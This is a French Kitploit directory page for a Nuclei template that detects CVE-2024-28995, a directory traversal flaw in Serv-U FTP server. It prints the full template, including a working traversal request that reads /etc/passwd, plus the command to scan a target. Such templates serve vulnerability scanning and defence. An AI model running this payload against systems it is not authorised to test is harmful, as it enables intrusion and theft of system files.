Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-28995-Nuclei-Template — Modèle Nuclei pour la détection de CVE-2024-28995, une vulnérabilité de traversée de répertoire dans le serveur FTP Serv-U, permettant la lecture de fichiers via des requêtes HTTP conçues. | Kitploit
Outils/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
Scanners de VulnérabilitésScanners de Vulnérabilités WebAnalyse des VulnérabilitésExploitationSécurité WebTests d'Intrusion
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

Modèle Nuclei pour la détection de CVE-2024-28995, une vulnérabilité de traversée de répertoire dans le serveur FTP Serv-U, permettant la lecture de fichiers via des requêtes HTTP conçues.

Voir le dépôt
14il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Modèle Nuclei pour CVE-2024-28995

Vérifie la vulnérabilité de traversée de répertoire dans les versions de Serv-U 15.4.2 et inférieures, qui permet de lire des fichiers sensibles comme /etc/passwd.

Détails du modèle

root@kitploit:~
id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



Utilisation

Pour utiliser ce modèle avec Nuclei, enregistrez le contenu du modèle dans un fichier nommé CVE-2024-28995.yaml et exécutez la commande suivante :

root@kitploit:~
nuclei -t CVE-2024-28995.yaml -u <target-url>

Remplacez <target-url> par l'URL de la cible que vous souhaitez analyser.

Contact

Pour toute demande ou information complémentaire, vous pouvez me contacter via :

  • LinkedIn
  • Twitter
Télécharger l’outil